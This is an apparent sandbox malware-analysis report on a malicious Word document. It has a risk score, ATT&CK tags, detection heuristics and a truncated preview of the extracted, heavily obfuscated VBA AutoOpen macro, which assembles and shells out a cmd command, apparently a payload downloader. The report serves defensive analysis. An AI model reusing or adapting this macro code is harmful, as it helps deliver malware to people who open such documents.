MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening. The macro attempts to construct and execute a command, likely to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.Juju-6799075-0' further supports its malicious nature as a downloader.
Heuristics 5
-
ClamAV: Doc.Downloader.Juju-6799075-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Juju-6799075-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23821 bytes |
SHA-256: 86c5f63114fd341dacb9dfb5a124faa3613691ddeacbdae80e052f55ecbf15db |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ObaErKVQz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName cShuS
TypeName Chr(LlzFt / sYkazu + JGlwDP / azslpw)
TypeName 9
TypeName sMQuw
TypeName Rnd(5)
TypeName 2244
Shell! KeyString(vbKeyC) + DliVmfiQHo + zVATRGWjiqDn + jQIYhP + LvurYk + DzOkMsrmm + kldKdwY + acTAojqdcOi + zPjJIZaNDEV + fOiuQoI + AboZOPfJ + NJGiNKi + oBYVdoVCq + tpsTYrk + pWMzYbUVc + MuKdrPsFXM + KolSLSCsWsN + LXOGh + QNWbDiwbm + WkWjdYF, 348542161 - 348542161
TypeName CBool(iqibm)
TypeName Cos(MpwAk)
TypeName 9762
End Sub
Attribute VB_Name = "EjvdAub"
Function jQIYhP()
On Error Resume Next
TypeName Sgn(rAlEz)
TypeName WSNdI
qBsqvlHwP = "m" + "d" + " /" + "V " + " " + " /"
TypeName 68
TypeName 220634239
lbYUiRvdS = CStr(Chr(USOSBvAACiUnn + OopaTsBCL + 67 + QSFHQvmBkwi + spINiubt)) + " " + " " + CStr(Chr(UtlEjzTPDla + vuRYAmiSjAfi + 34 + nTRFhtmkOfrD + jbCkMHNTR)) + "se" + "t " + " K" + "8=" + "EPB"
TypeName Chr(135818028)
TypeName CLng(7)
plLYYcZjb = "i" + CStr(Chr(GnNlsGVFOjw + tlwKjmhwiSm + 99 + uVWVTCwdaFZzVY + pkjqWqaKCniofY)) + "Vv" + "rR" + CStr(Chr(iuLzjsNupCT + LKNLwthCQc + 99 + LTfXHwBjwVbNVO + pBTWuorcRd)) + "p" + "jT" + "G" + "f;H" + "xs" + "}" + "ezy"
TypeName Cos(3)
TypeName CStr(8595 * KwQJZz)
TypeName 9413
rDzmFFQI = "W 0" + "S," + "(k" + "M" + "){" + "mh:"
TypeName 6948
TypeName Sgn(33403 + 81924)
TypeName ChrW(78602 - 6667)
jzMlWOqRE = "g" + "=+I" + "D" + "u" + CStr(Chr(oYNSGFXZhWh + wYqjApkwK + 76 + IiAXbCGiR + ZHIGQqXpSTPEwP)) + "3" + "-." + "F6n" + "o9" + "b4" + CStr(Chr(QowidMwJYEAzi + muAwjau + 67 + YUtvtdCHbJqqVo + IzhLqZKCQ))
TypeName jktjd
TypeName 4998
JZiXm = "wtq" + "U$@" + "A" + "\/" + "Na" + CStr(Chr(zQRSVPCJ + DQuCsWVaM + 108 + ilbbMMDz + iQTEqJqUaTiJv)) + "d" + "'" + "&& "
TypeName Atn(MEwRpo)
TypeName 574
TypeName 185356805
cQwcbU = "fo" + "r %" + "o i" + "n " + " ( " + " " + "10" + " " + " ," + " " + " 49" + ", " + " 54"
TypeName Hex(129972124)
TypeName PdPdq
WVOsHf = ", 2" + "0 " + " " + ", " + "7 " + " ,"
TypeName Log(UIAEGY)
TypeName PnGAQ
CSkrHChCnM = " " + " " + "18 " + " " + "," + " " + " " + "34" + ", "
TypeName RHiCmj
TypeName CInt(46165 * MrCzOq)
TypeName Rnd(1700)
KJnCQAjK = " " + "2" + "0, " + " " + "65 " + " " + ",65" + " ,"
TypeName Chr(46871 - ZHzaaY - 48036 / 59)
TypeName 35
EhAwICu = " " + "2" + "4, " + " " + " "
jQIYhP = qBsqvlHwP + lbYUiRvdS + plLYYcZjb + rDzmFFQI + jzMlWOqRE + JZiXm + cQwcbU + WVOsHf + CSkrHChCnM + KJnCQAjK + EhAwICu
TypeName Sgn(4)
TypeName 745
End Function
Function LvurYk()
On Error Resume Next
TypeName dczkFS
TypeName Tan(LHjmN - XiTqj / fPRbap - NSqRkn)
jvBfsLEF = " " + "5" + "8" + " " + " ,4" + "2" + " " + " " + " " + ", " + "14 " + " ," + " "
TypeName CDate(JqtKOK * KQctE)
TypeName XMSHT
TypeName TrmLwJ
cjANRnZC = " " + " 3" + " ," + " 3" + "7 "
TypeName wAsQHH
TypeName CDate(5963)
SNWiPSOSH = " ," + "48" + " " + ", " + "2" + "0 " + " " + ",54" + " " + " , " + " "
TypeName CInt(89134 + wkndrD)
TypeName 38
VJRYppsCz = " 44" + " " + " ," + " " + " 49"
TypeName Chr(uCtwzB)
TypeName 36
TypeName Cos(51282 - RdsnKG - 85782 + ilSOQl)
OuiHwjtKf = " " + ", " + " 51" + " " + " " + " " + " ," + " " + " " + " 11"
TypeName mlpXQ
TypeName CDbl(4)
JKvlrmGTnv = " " + " , " + " " + "20," + " " + " 9 " + ", " + " 5" + "5 " + ", " + " 24" + " " + " "
LvurYk = jvBfsLEF + cjANRnZC + SNWiPSOSH + VJRYppsCz + OuiHwjtKf + JKvlrmGTnv
TypeName Sgn(wUHFVt)
TypeName LUszT
TypeName ChrB(CaWbf)
End Function
Function DzOkMsrmm()
On Error Resume Next
TypeName CSng(68823 + fQtlK + vmiLH - WYPYK)
TypeName rvXSAd
oGVXLdF = ",6" + "3 " + " " + " ," + " " + " " + "20" + " " + " " + ", " + " 5"
TypeName
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.